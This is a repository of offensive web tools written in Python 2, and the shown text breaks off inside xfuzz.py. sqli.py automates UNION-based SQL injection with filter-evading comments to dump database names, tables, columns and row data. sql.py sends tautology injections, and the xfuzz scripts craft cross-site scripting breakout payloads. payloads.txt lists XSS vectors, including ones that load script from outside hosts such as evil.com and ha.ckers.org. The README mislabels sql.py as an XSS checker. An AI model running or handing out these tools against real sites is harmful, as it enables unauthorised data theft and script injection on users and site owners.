├── README.md
├── payloads.txt
├── sql.py
├── sqli.py
├── xfuzz-simple.py
├── xfuzz.py
└── xss.py


/README.md:
--------------------------------------------------------------------------------
 1 | # SQL-XSS
 2 | A few SQL and XSS attack tools
 3 | ## SQLi.py
 4 | Inspired but not based on the popular tool SQLmap, SQLi is a SQL vulnerability checker and a database takeover tool
 5 | ## xfuzz.py 
 6 | xfuzz is a Python script to check for cross-site scripting attacks and what payload is used to cleanly break out of the code. xfuzz takes care of crafting the payload for you by first detecting the location of the parameter reflection, then using a number of tests to determine what payload is needed.
 7 | ## xfuzz-simple.py
 8 | xfuzz-simple is a simple, more easier and clean way for the pentesters that just want the payload and no extra details. (same as xfuzz, but with less detail)
 9 | ## xss.py
10 | Xss.py checks for cross-site scripting attacks in websites and reports it back to you.
11 | ## sql.py
12 | sql.py checks for cross-site scripting attacks in websites and reports it back to you.
13 | 


--------------------------------------------------------------------------------
/payloads.txt:
--------------------------------------------------------------------------------
 1 | <body onload=alert("XSS")>
 2 | <img src="javascript:alert("XSS");">
 3 | <iframe src="http://evil.com/xss.html">
 4 | <input type="image" src="javascript:alert('XSS');">
 5 | <link rel="stylesheet" href="javascript:alert('XSS');">
 6 | <table background="javascript:alert('XSS')">
 7 | <div style="background-image: url(javascript:alert('XSS'))">
 8 | <object type="text/x-scriptlet" data="http://hacker.com/xss.html">
 9 | >'>"><img src=x onerror=alert(0)>
10 | <svg/onload=alert(/RUTHLESS/)>
11 | <img src='aaa'onerror=alert(/@_t0x1c/)>
12 | <!'/*!'/*!//'/*//'/*--!><Input/Autofocus/%0D*/Onfocus=confirm'1'//><Svg>
13 | </style></scRipt><scRipt>alert('OPENBUGBOUNTY')</scRipt>
14 | <sCriPt>alert(1);</sCriPt>
15 | <script>alert(1)</script>
16 | <script src=http://ha.ckers.org/xss.js></script>
17 | '><script>alert(1)</script>
18 | \"><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>
19 | \"><script>alert(1)</script>
20 | \"\/><img src=\"blahjpg\" onerror=\"alert('XSS')\"/>
21 | \"\/><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>
22 | \"/><script>alert(1)</script>
23 | <IMG \"\"\"><script>alert(\"XSS\")</script>\">
24 | <script>alert(String.fromCharCode(88,83,83));</script>
25 | "onmouseover=prompt(/XSSPOSED/)
26 | </title><body onload=alert("XSS")>
27 | </title><script>alert(1)</script>
28 | "></title></style></scRipt><scRipt>alert('OPENBUGBOUNTY')</scRipt>


--------------------------------------------------------------------------------
/sql.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import urllib
 3 | 
 4 | fullurl = raw_input("Url: ")
 5 | errormsg = "You have an error in your SQL syntax"
 6 | payloads = ["'admin'or 1=1 or ''='", "'=1\' or \'1\' = \'1\'", "'or 1=1", "'1 'or' 1 '=' 1", "'or 1=1#", "'0 'or' 0 '=' 0", "'admin'or 1=1 or ''='", "'admin' or 1=1", "'admin' or '1'='1", "'or 1=1/*", "'or 1=1--"] #whatever payloads you want here ## YOU CAN ADD YOUR OWN
 7 | errorr = "yes"
 8 | for payload in payloads:
 9 |     try:
10 |         payload = payload
11 |         resp = urllib.urlopen(fullurl + payload)
12 |         body = resp.read()
13 |         fullbody = body.decode('utf-8')
14 |     except:
15 |         print "[-] Error! Manually check this payload: " + payload
16 |         errorr = "no"
17 |         #sys.exit()
18 |     if errormsg in fullbody:
19 |         if errorr == "no":
20 |             print "[-] That payload might not work!"
21 |             errorr = "yes"
22 |         else:
23 |             print "[+] The website is SQL injection vulnerable! Payload: " + payload
24 |     else:
25 |         print "[-] The website is not SQL injection vulnerable!"
26 | 


--------------------------------------------------------------------------------
/sqli.py:
--------------------------------------------------------------------------------
  1 | import urllib as toxic
  2 | import sys
  3 | import os
  4 | import platform
  5 | 
  6 | clear = "clear"
  7 | if platform.system() == "Windows":
  8 |     clear = "cls"
  9 | os.system(str(clear))
 10 | 
 11 | header="""
 12 |   _________________  .____    .__ 
 13 |  /   _____/\_____  \ |    |   |__|
 14 |  \_____  \  /  / \  \|    |   |  |
 15 |  /        \/   \_/.  \    |___|  |
 16 | /_______  /\_____\ \_/_______ \__|
 17 |         \/        \__>       \/   
 18 | """
 19 | print header
 20 | 
 21 | class Sqli:
 22 |     url = None
 23 |     vulCol = None
 24 |     columns = None
 25 |     dbs = []
 26 |     payload = "0x2d31+/*!50000union*/+/*!50000select*/"
 27 |     build = ["", ""]
 28 |     key = "1620597971540027"
 29 |     def setUrl(self):
 30 |         for k, v in enumerate(sys.argv):
 31 |             if v == "--url":
 32 |                 try:
 33 |                     u = sys.argv[k+1]
 34 |                     pos = u.find("=")
 35 |                     url = u[:pos+1]
 36 |                     self.url = url
 37 |                 except:
 38 |                     pass              
 39 |         try:
 40 |             print "Url: "+u
 41 |             print "\n"
 42 |         except NameError:
 43 |             pass
 44 |             print "*ERROR*: Url not defined!\n"
 45 |             print "Usage: python sqli.py --url http://testphp.vulnweb.com/listproducts.php?cat=1\n"
 46 |             exit()
 47 | 
 48 |     def getContent(self,url):
 49 |         res = toxic.urlopen(url)
 50 |         return res.read() 
 51 | 
 52 |     def setColumns(self):
 53 |         try:
 54 |             print "Start Count Columns..."
 55 |             url = self.url + self.payload
 56 |             start = 1
 57 |             finish = 50
 58 |             for i in range(start,finish):
 59 |                 sys.stdout.write("\rColumns Total: {0}".format(i))
 60 |                 if i != start and i != finish:
 61 |                     url+=", "
 62 |                 url+=self.key
 63 |                 res = self.getContent(url)
 64 |                 if res.find("union select") ==-1:
 65 |                     if res.find("1620597971540027") !=-1:
 66 |                         self.columns = i
 67 |                         return    
 68 |             self.columns = 0
 69 |         except:
 70 |             print "\nError!"
 71 |             exit()
 72 | 
 73 |     def setVulCol(self):
 74 |         for i in range(1, self.columns+1):
 75 |             line = self.payload
 76 |             for j in range(1, self.columns+1):
 77 |                 if j != 1 and j != self.columns+1:
 78 |                     line = line + ", "
 79 |                 if i == j:
 80 |                     line+="/*!50000ConCat(0x27,"+self.key+",0x27)*/"
 81 |                 else:
 82 |                     line+="/*!50000ConCat(0x27,"+str(j)+",0x27)*/"
 83 |             res = self.getContent(self.url + line)
 84 |             if res.find(self.key) !=-1:
 85 |                 self.vulCol = i
 86 |                 return
 87 |         self.vulCol = 0
 88 |         exit()
 89 | 
 90 |     def getConcat(self,string):
 91 |         return "/*!50000Concat(0x5e27,/*!50000gROup_cONcat("+string+")*/,0x275e)"
 92 | 
 93 |     def getVars(self,content):
 94 |         pos = content.find("^'")
 95 |         if(pos != -1):      
 96 |             ini = content[pos+2:]
 97 |             pos = ini.find("'^")
 98 |             if(pos !=-1):
 99 |                 return ini[:pos]
100 |             else:
101 |                 print "*ERROR*: Not found!\n"
102 |                 exit()
103 | 
104 |     def getDatabase(self):
105 |         self.build = [self.url + self.payload, ""]
106 |         line = ""
107 |         side = 0
108 |         for i in range(1, self.columns+1):
109 |             if i != 1 and i != self.columns+1:
110 |                 line=","
111 |             if side == 0:
112 |                 if i != self.vulCol:
113 |                     self.build[side]+=line+str(i)
114 |                     line+= str(i) 
115 |                 else:
116 |                     if i !=1:
117 |                         self.build[side]+=","
118 |                     side = 1
119 |             else:
120 |                 self.build[side]+=line+str(i)
121 |         url = self.build[0]+"/*!50000Group_Concat(0x5e27,database(),0x275e)*/"+self.build[1]
122 |         res = self.getContent(url)
123 |         return self.getVars(res)
124 | 
125 |     def getTables(self,database):
126 |         url = self.build[0]+self.getConcat("table_name")+self.build[1]+"++from+/*!50000inforMAtion_schema*/.tables+ /*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+"
127 |         res = self.getContent(url)
128 |         return self.getVars(res)
129 | 
130 |     def charCode(self,string):
131 |         char = ""
132 |         last = len(string)-1
133 |         i = 0
134 |         for j in string:
135 |             char+=str(ord(j))
136 |             if last != i:
137 |                 char+=", "
138 |             i+=1
139 |         return char
140 | 
141 |     def getColumns(self,table,database):
142 |         url = self.build[0]+self.getConcat("column_name")+self.build[1]+"++from+/*!50000inforMAtion_schema*/.columns+ /*!50000wHEre*/+/*!50000taBLe_name*/=CHAR("+self.charCode(table)+")--+"
143 |         res = self.getContent(url)
144 |         return self.getVars(res)
145 | 
146 |     def getData(self,cols,table,database):
147 |         line = ""
148 |         i = 0
149 |         title = ""
150 |         space = []
151 |         for name in cols:
152 |             space.append(len(name))
153 |             title+=name+"\t"
154 |             if i !=0:
155 |                 line+=",0x3a,"
156 |             line+=name
157 |             i+=1
158 |         url = self.build[0]+"/*!50000ConCAt(0x5e27,/*!50000gROup_cONcat("+line+")*/,0x275e)"+self.build[1]+"+from+"+table+"--+-"
159 |         res = self.getContent(url)
160 |         data = self.getVars(res)
161 |         try:
162 |             rows = data.split(",")
163 |         except:
164 |             print "*ERROR*: Not found!\n"
165 |         vector = []
166 |         for j in rows:
167 |             i=0
168 |             col = j.split(":")
169 |             temp = []
170 |             for k in col:
171 |                 temp.append(k)
172 |                 if len(k)>space[i]:
173 |                     space[i]=len(k)
174 |                 i=i+1
175 |             vector.append(temp)
176 |         self.dbs[0].tables[0].setDatas(vector)
177 |         line=""
178 |         i=0
179 |         for j in cols:
180 |             line+=j
181 |             for k in range(len(j),space[i]+2):
182 |                 line+=" "
183 |         print line
184 |         for j in rows:
185 |             i = 0
186 |             col = j.split(":")
187 |             line=""
188 |             i=0
189 |             for k in col:
190 |                 line+=k
191 |                 for l in range(len(k),space[i]+2):
192 |                     line +=" "
193 |                 i=i+1
194 |             print line
195 | 
196 | class Db:
197 |     name = None
198 |     tables = []
199 |     def setName(self, name):
200 |         self.name = name
201 |     def setTables(self, table):
202 |         self.tables = table
203 |         
204 | class Tb:
205 |     name = None
206 |     columns = []
207 |     rows = []
208 |     def setName(self,name):
209 |         self.name = name
210 |     def setColumns(self,columns):
211 |         self.columns = columns
212 |     def setDatas(self,rows):
213 |         self.rows = rows
214 | 
215 | s = Sqli()
216 | s.setUrl()
217 | 
218 | s.setColumns()
219 | s.setVulCol()
220 | print "\nVul Column: " +str(s.vulCol)
221 | 
222 | db = Db()
223 | database = s.getDatabase()
224 | db.setName(database)
225 | s.dbs.append(db)
226 | 
227 | for i in s.dbs:
228 |     print "Database: " + i.name
229 | 
230 | tbs = []
231 | tables = s.getTables(s.dbs[0].name)
232 | for i in tables.split(","):
233 |     tb = Tb()
234 |     tb.setName(i)
235 |     tbs.append(tb)
236 | 
237 | s.dbs[0].setTables(tbs)
238 | print "Tables: "+tables
239 | 
240 | sys.stdout.write("\nTable: ")
241 | table = raw_input()
242 | cols = s.getColumns(table,s.dbs[0].name)
243 | cls = cols.split(",")
244 | s.dbs[0].tables[0].setColumns(cls)
245 | print "Columns: "+cols
246 | 
247 | sys.stdout.write("\nColumns names: ")
248 | cols = raw_input().split(",")
249 | s.getData(cols,table,database)
250 | 


--------------------------------------------------------------------------------
/xfuzz-simple.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | from urlparse import urlparse, parse_qs
  3 | from HTMLParser import HTMLParser
  4 | import urllib
  5 | import urllib2
  6 | import sys
  7 | import re, time
  8 | 
  9 | XSSCHECKVAL = "CHECKXSSHERE"      #Must be plaintext word unlikely to appear on the page
 10 | URL = ""
 11 | NUM_REFLECTIONS = 0           
 12 | 
 13 | CURRENTLY_OPEN_TAGS = []      
 14 | OPEN_TAGS = []                
 15 | OPEN_EMPTY_TAG = ""
 16 | TAGS_TO_IGNORE = ['html','body','br']   
 17 | TAG_WHITELIST = ['input', 'textarea']             
 18 | 
 19 | OCCURENCE_NUM = 0
 20 | OCCURENCE_PARSED = 0
 21 | LIST_OF_PAYLOADS = []
 22 | 
 23 | FUZZING_PAYLOADS_BASE = [
 24 |     "<script>alert(1)</script>",
 25 |     "<sCriPt>alert(1);</sCriPt>",
 26 |     "<script src=http://ha.ckers.org/xss.js></script>",
 27 |     "<script>alert(String.fromCharCode(88,83,83));</script>",
 28 |     "<IMG \"\"\"><script>alert(\"XSS\")</script>\">",
 29 |     "<img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>"
 30 | ]
 31 | 
 32 | FUZZING_PAYLOADS_START_END_TAG = [
 33 |     "\"/><script>alert(1)</script>",
 34 |     "\"\/><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>",
 35 |     "\"\/><img src=\"blahjpg\" onerror=\"alert('XSS')\"/>"
 36 | ]
 37 | 
 38 | FUZZING_PAYLOADS_ATTR = [
 39 |     "\"><script>alert(1)</script>",
 40 |     "\"><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>",
 41 |     "'><script>alert(1)</script>"
 42 | ]
 43 | 
 44 | #######################################################################################################################
 45 | # MAIN FUNCTION
 46 | #######################################################################################################################
 47 | def main():    
 48 |     if (len(sys.argv) != 2 or XSSCHECKVAL not in sys.argv[1]):
 49 |         exit("Usage: python xfuzz-simple.py <FULL URL REPLACING PARAM WITH " + XSSCHECKVAL + ">\nExample: python xfuzz-simple.py http://site.com/?param=" + XSSCHECKVAL + "\n")
 50 |     global URL
 51 |     URL = sys.argv[1]
 52 |     
 53 |     init_resp = make_request(URL)
 54 |     if(XSSCHECKVAL.lower() in init_resp.lower()):
 55 |         global NUM_REFLECTIONS
 56 |         NUM_REFLECTIONS = init_resp.lower().count(XSSCHECKVAL.lower())
 57 |         print "[+] Response contains parameter value! In code " + str(NUM_REFLECTIONS) + " time(s)."
 58 |         
 59 |     else:
 60 |         exit("[-] ERROR. Check value not in response. Nothing to test. Exiting...\n")
 61 |     
 62 |     for i in range(NUM_REFLECTIONS):
 63 |         print "\n############################\nTESTING OCCURENCE NUMBER: " + str(i + 1) + "\n############################"
 64 |         global OCCURENCE_NUM
 65 |         OCCURENCE_NUM = i+1
 66 |         scan_occurence(init_resp)
 67 |         global ALLOWED_CHARS, IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG, CURRENTLY_OPEN_TAGS, OPEN_TAGS, OCCURENCE_PARSED, OPEN_EMPTY_TAG
 68 |         ALLOWED_CHARS, CURRENTLY_OPEN_TAGS, OPEN_TAGS = [], [], []
 69 |         IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG = False, False, False, False, False
 70 |         OCCURENCE_PARSED = 0
 71 |         OPEN_EMPTY_TAG = ""
 72 |     
 73 |     print "\n##################################################\n[+] Scan complete. Full list of possible payloads:"
 74 |     for payload in LIST_OF_PAYLOADS:
 75 |         print payload
 76 | 
 77 | def scan_occurence(init_resp):
 78 |     #print "Checking for location of " + XSSCHECKVAL + "..."
 79 |     location = html_parse(init_resp)
 80 |     if(location == "comment"):
 81 |         #print "[+] Found in an HTML comment."
 82 |         print ""
 83 |         break_comment()
 84 |     elif(location == "script_data"):
 85 |         #print "[+] Found as data in a script tag."
 86 |         print ""
 87 |     elif(location == "html_data"):
 88 |         #print "[+] Found as data or plaintext on the page."
 89 |         print ""
 90 |         break_data()
 91 |     elif(location == "start_end_tag_attr"):
 92 |         #print "[+] Found as an attribute in an empty tag."
 93 |         print ""
 94 |         break_start_end_attr()
 95 |     elif(location == "attr"):
 96 |         #print "[+] Found as an attribute in an HTML tag."
 97 |         print ""
 98 |         break_attr()
 99 | 
100 | def html_parse(init_resp):
101 |     parser = MyHTMLParser()
102 |     location = ""
103 |     try:
104 |         parser.feed(init_resp)
105 |     except Exception as e:
106 |         location = str(e)
107 |     except:
108 |         print "[-] ERROR. Try rerunning?"
109 |     return location
110 | 
111 | def test_param_check(param_to_check, param_to_compare):
112 |     check_string = "XSSSTART" + param_to_check + "XSSEND"
113 |     compare_string = "XSSSTART" + param_to_compare + "XSSEND"
114 |     check_url = URL.replace(XSSCHECKVAL, check_string)
115 |     try:
116 |         check_response = make_request(check_url)
117 |     except:
118 |         check_response = ""
119 |     success = False
120 |     
121 |     occurence_counter = 0
122 |     for m in re.finditer('XSSSTART', check_response, re.IGNORECASE):
123 |         occurence_counter += 1
124 |         if((occurence_counter == OCCURENCE_NUM) and (check_response[m.start():m.start()+len(compare_string)].lower() == compare_string.lower())):
125 |             success = True
126 |             break
127 |     return success
128 | 
129 | def make_request(in_url):
130 |     try:
131 |         req = urllib2.Request(in_url)
132 |         resp = urllib2.urlopen(req)
133 |         return resp.read()
134 |     except:
135 |         print "\n[-] ERROR Could not open URL. Exiting...\n"
136 | 
137 | def break_comment():
138 |     payload = "--><script>alert(1);</script>"
139 |     if(test_param_check(payload,payload)):
140 |         payload = "--><script>alert(1);</script>"
141 |         if(test_param_check(payload + "<!--",payload+"<!--")):
142 |             payload = "--><script>alert(1);</script><!--"
143 |     else:
144 |         if(test_param_check("-->", "-->")):
145 |             clean = test_param_check("<!--", "<!--")
146 |             found = False
147 |             for pl in FUZZING_PAYLOADS_BASE:
148 |                 pl = "-->" + pl
149 |                 if(clean):
150 |                     pl = pl + "<!--"
151 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
152 |                     payload = pl
153 |                     LIST_OF_PAYLOADS.append(pl) #######################################################################################################################
154 |                     found = True
155 |                     break
156 |             if(not found):
157 |                 print "[-] ERROR. No successful fuzzing attacks. Check manually to confirm."
158 |         else:
159 |             payload = ""
160 |             print "[-] ERROR. Cannot escape comment because the --> string needed to close the comment is escaped."
161 |             
162 |     if(payload):
163 |         if(payload not in LIST_OF_PAYLOADS):
164 |             LIST_OF_PAYLOADS.append(payload)
165 |         #print "[+] SUCCESS. Parameter was reflected in a comment. Use the following payload to break out:"
166 |         print "[+] " + payload + " IS POSSIBLE!"
167 |         time.sleep(2)
168 |         #print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
169 |     
170 | def break_data():
171 |     payload = "<script>alert(1);</script>"
172 |     if("textarea" in CURRENTLY_OPEN_TAGS):
173 |         payload = "</textarea>" + payload
174 |     if("title" in CURRENTLY_OPEN_TAGS):
175 |         payload = "</title>" + payload
176 |     if(test_param_check(payload,payload)):
177 |         payload = payload
178 |     else:
179 |         found = False
180 |         for pl in FUZZING_PAYLOADS_BASE:
181 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
182 |                     payload = pl
183 |                     found = True
184 |                     break
185 |         if(not found):
186 |             payload = ""
187 |             print "[-] ERROR. No successful fuzzing attacks. Check manually to confirm."
188 | 
189 |     if(payload):
190 |         if(payload not in LIST_OF_PAYLOADS):
191 |             LIST_OF_PAYLOADS.append(payload)
192 |         #print "[+] SUCCESS. Parameter was reflected in data or plaintext. Use the following payload to break out:"
193 |         print "[+] " + payload + " IS POSSIBLE!"
194 |         time.sleep(2)
195 |         #print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
196 | 
197 | def break_start_end_attr():
198 |     print "\n[Can tag attribute be escaped to execute XSS?]"
199 |     payload = "\"/><script>alert(1);</script>"
200 |     if(test_param_check(payload,payload)):
201 |         payload = "\"/><script>alert(1);</script>"
202 |         if(test_param_check(payload+"<br%20attr=\"", payload+"<br attr=\"")):
203 |             payload = "\"/><script>alert(1);</script><br attr=\""
204 |     else:
205 |         if(test_param_check("/>", "/>")):
206 |             clean = test_param_check("<br%20attr=\"", "<br attr=\"")
207 |             found = False
208 |             for pl in FUZZING_PAYLOADS_START_END_TAG:
209 |                 if(clean):
210 |                     pl = pl + "<br attr=\""
211 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
212 |                     payload = pl
213 |                     found = True
214 |                     break
215 |             if(not found):
216 |                 payload = ""
217 |                 print "[-] No successful fuzzing attacks. Check manually to confirm."
218 |         else:
219 |             print "[-] WARNING. /> cannot be used to end the empty tag. Resorting to invalid HTML."
220 |             payloads_invalid = [
221 |                 "\"></" + OPEN_EMPTY_TAG + "><script>alert(1);</script>",
222 |                 "\"<div><script>alert(1);</script>"
223 |                 ]
224 |             found = False
225 |             for pl in payloads_invalid:
226 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
227 |                     payload = pl
228 |                     found = True
229 |                     break
230 |             if(not found):
231 |                 payload = ""
232 |                 print "[-] ERROR! Cannot escape out of the attribute tag using all fuzzing payloads. Check manually to confirm."
233 |             
234 |     if(payload):
235 |         if(payload not in LIST_OF_PAYLOADS):
236 |             LIST_OF_PAYLOADS.append(payload)
237 |         #print "[+] SUCCESS. Parameter was reflected in an attribute of an empty tag. Use the following payload to break out:"
238 |         print "[+] " + payload + " IS POSSIBLE!"
239 |         time.sleep(2)
240 |         #print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
241 | 
242 | def break_attr():
243 |     payload = "\"></" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "><script>alert(1);</script>"
244 |     if(test_param_check(payload,payload)):
245 |         if(test_param_check(payload + "<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "%20attr=\"", payload + "<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + " attr=\"")):
246 |             payload = "\"></" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "><script>alert(1);</script><" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + " attr=\""
247 |     else:
248 |         if(test_param_check("\">", "\">")):
249 |             clean_str = "<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + " attr=\""
250 |             clean = test_param_check("<" + CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS) - 1] + "%20attr=\"", clean_str)
251 |             found = False
252 |             for pl in FUZZING_PAYLOADS_ATTR:
253 |                 if(clean):
254 |                     pl = pl + clean_str
255 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
256 |                     payload = pl
257 |                     found = True
258 |                     break
259 |             if(not found):
260 |                 payload = ""
261 |                 print "[-] After trying all fuzzing attacks, none were successful. Check manually to confirm."
262 |         else:
263 |             print "[-] WARNING. \"> cannot be used to end the empty tag. Resorting to invalid HTML."
264 |             payloads_invalid = [
265 |                 "\"<div><script>alert(1);</script>",
266 |                 "\"</script><script>alert(1);</script>",
267 |                 "\"</><script>alert(1);</script>",
268 |                 "\"</><script>alert(1)</script>",
269 |                 "\"<><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>",
270 |                 ]
271 |             found = False
272 |             for pl in payloads_invalid:
273 |                 if(test_param_check(urllib.quote_plus(pl), pl)):
274 |                     payload = pl
275 |                     found = True
276 |                     break
277 |             if(not found):
278 |                 payload = ""
279 |                 print "[-] ERROR. Cannot escape out of the attribute tag using all fuzzing payloads. Check manually to confirm."
280 |             
281 |     
282 |     if(payload):
283 |         if(payload not in LIST_OF_PAYLOADS):
284 |             LIST_OF_PAYLOADS.append(payload)
285 |         #print "[+] SUCCESS. Parameter was reflected in an attribute of an HTML tag. Use the following payload to break out:"
286 |         print "[+] " + payload + " IS POSSIBLE!"
287 |         time.sleep(2)
288 |        # print "[+] Full URL Encoded: " + URL.replace(XSSCHECKVAL, urllib.quote_plus(payload))
289 |         
290 | #HTML Parser class
291 | class MyHTMLParser(HTMLParser):
292 |     def handle_comment(self, data):
293 |         global OCCURENCE_PARSED
294 |         if(XSSCHECKVAL.lower() in data.lower()):
295 |             OCCURENCE_PARSED += 1
296 |             if(OCCURENCE_PARSED == OCCURENCE_NUM):
297 |                 raise Exception("comment")
298 |     
299 |     def handle_startendtag(self, tag, attrs):
300 |         global OCCURENCE_PARSED
301 |         global OCCURENCE_NUM
302 |         global OPEN_EMPTY_TAG
303 |         if (XSSCHECKVAL.lower() in str(attrs).lower()):
304 |             OCCURENCE_PARSED += 1
305 |             if(OCCURENCE_PARSED == OCCURENCE_NUM):
306 |                 OPEN_EMPTY_TAG = tag
307 |                 raise Exception("start_end_tag_attr")
308 |             
309 |     def handle_starttag(self, tag, attrs):
310 |         global CURRENTLY_OPEN_TAGS
311 |         global OPEN_TAGS
312 |         global OCCURENCE_PARSED
313 |         #print CURRENTLY_OPEN_TAGS
314 |         if(tag not in TAGS_TO_IGNORE):
315 |             CURRENTLY_OPEN_TAGS.append(tag)
316 |         if (XSSCHECKVAL.lower() in str(attrs).lower()):
317 |             if(tag == "script"):
318 |                 OCCURENCE_PARSED += 1
319 |                 if(OCCURENCE_PARSED == OCCURENCE_NUM):
320 |                     raise Exception("script")
321 |             else:
322 |                 OCCURENCE_PARSED += 1
323 |                 if(OCCURENCE_PARSED == OCCURENCE_NUM):
324 |                     raise Exception("attr")
325 | 
326 |     def handle_endtag(self, tag):
327 |         global CURRENTLY_OPEN_TAGS
328 |         global OPEN_TAGS
329 |         global OCCURENCE_PARSED
330 |         if(tag not in TAGS_TO_IGNORE):
331 |             CURRENTLY_OPEN_TAGS.remove(tag)
332 |             
333 |     def handle_data(self, data):
334 |         global OCCURENCE_PARSED
335 |         if (XSSCHECKVAL.lower() in data.lower()):
336 |             OCCURENCE_PARSED += 1
337 |             if(OCCURENCE_PARSED == OCCURENCE_NUM):
338 |                 try:
339 |                     if(CURRENTLY_OPEN_TAGS[len(CURRENTLY_OPEN_TAGS)-1] == "script"):
340 |                         raise Exception("script_data")
341 |                     else:
342 |                         raise Exception("html_data")
343 |                 except:
344 |                     raise Exception("html_data")
345 | if __name__ == "__main__":
346 |     main()
347 | 


--------------------------------------------------------------------------------
/xfuzz.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | from urlparse import urlparse, parse_qs
  3 | from HTMLParser import HTMLParser
  4 | import urllib
  5 | import urllib2
  6 | import sys
  7 | import re
  8 | 
  9 | XSSCHECKVAL = "CHECKXSSHERE"      #Must be plaintext word unlikely to appear on the page
 10 | URL = ""
 11 | NUM_REFLECTIONS = 0           
 12 | 
 13 | CURRENTLY_OPEN_TAGS = []      
 14 | OPEN_TAGS = []                
 15 | OPEN_EMPTY_TAG = ""
 16 | TAGS_TO_IGNORE = ['html','body','br']   
 17 | TAG_WHITELIST = ['input', 'textarea']             
 18 | 
 19 | OCCURENCE_NUM = 0
 20 | OCCURENCE_PARSED = 0
 21 | LIST_OF_PAYLOADS = []
 22 | 
 23 | FUZZING_PAYLOADS_BASE = [
 24 |     "<script>alert(1)</script>",
 25 |     "<sCriPt>alert(1);</sCriPt>",
 26 |     "<script src=http://ha.ckers.org/xss.js></script>",
 27 |     "<script>alert(String.fromCharCode(88,83,83));</script>",
 28 |     "<IMG \"\"\"><script>alert(\"XSS\")</script>\">",
 29 |     "<img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>"
 30 | ]
 31 | 
 32 | FUZZING_PAYLOADS_START_END_TAG = [
 33 |     "\"/><script>alert(1)</script>",
 34 |     "\"\/><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>",
 35 |     "\"\/><img src=\"blahjpg\" onerror=\"alert('XSS')\"/>"
 36 | ]
 37 | 
 38 | FUZZING_PAYLOADS_ATTR = [
 39 |     "\"><script>alert(1)</script>",
 40 |     "\"><img src=\"blah.jpg\" onerror=\"alert('XSS')\"/>",
 41 |     "'><script>alert(1)</script>"
 42 | ]
 43 | 
 44 | #######################################################################################################################
 45 | # MAIN FUNCTION
 46 | #######################################################################################################################
 47 | def main():    
 48 |     if (len(sys.argv) != 2 or XSSCHECKVAL not in sys.argv[1]):
 49 |         exit("Usage: python xfuzz.py <FULL URL REPLACING PARAM WITH " + XSSCHECKVAL + ">\nExample: python xfuzz.py http://site.com/?param=" + XSSCHECKVAL + "\n")
 50 |     global URL
 51 |     URL = sys.argv[1]
 52 |     
 53 |     init_resp = make_request(URL)
 54 |     print "[+] Loaded URL!"
 55 |     
 56 |     if(XSSCHECKVAL.lower() in init_resp.lower()):
 57 |         global NUM_REFLECTIONS
 58 |         NUM_REFLECTIONS = init_resp.lower().count(XSSCHECKVAL.lower())
 59 |         print "[+] Response contains parameter value! Reflected in code " + str(NUM_REFLECTIONS) + " time(s)."
 60 |         
 61 |     else:
 62 |         exit("[-] ERROR. Check value not in response. Nothing to test. Exiting...\n")
 63 |     
 64 |     for i in range(NUM_REFLECTIONS):
 65 |         print "\n############################\nTESTING OCCURENCE NUMBER: " + str(i + 1) + "\n############################\n"
 66 |         global OCCURENCE_NUM
 67 |         OCCURENCE_NUM = i+1
 68 |         scan_occurence(init_resp)
 69 |         global ALLOWED_CHARS, IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG, CURRENTLY_OPEN_TAGS, OPEN_TAGS, OCCURENCE_PARSED, OPEN_EMPTY_TAG
 70 |         ALLOWED_CHARS, CURRENTLY_OPEN_TAGS, OPEN_TAGS = [], [], []
 71 |         IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG = False, False, False, False, False
 72 |         OCCURENCE_PARSED = 0
 73 |         OPEN_EMPTY_TAG = ""
 74 |     
 75 |     print "\n##########################################\n[+] Scan complete. Full list of possible payloads:"
 76 |     for payload in LIST_OF_PAYLOADS:
 77 |         print payload
 78 | 
 79 |     print "############################################"
 80 | 
 81 | def scan_occurence(init_resp):
 82 |     print "Checking for location of " + XSSCHECKVAL + "..."
 83 |     location = html_parse(init_resp)
 84 |     if(location == "comment"):
 85 |         print "[+] Found in an HTML comment."
 86 |         break_comment()
 87 |     elif(location == "script_data"):
 88 |         print "[+] Found as data in a script tag."
 89 |     elif(location == "html_data"):
 90 |         print "[+] Found as data or plaintext on the page."
 91 |         break_data()
 92 |     elif(location == "start_end_tag_attr"):
 93 |         print "[+] Found as an attribute in an empty tag."
 94 |         break_start_end_attr()
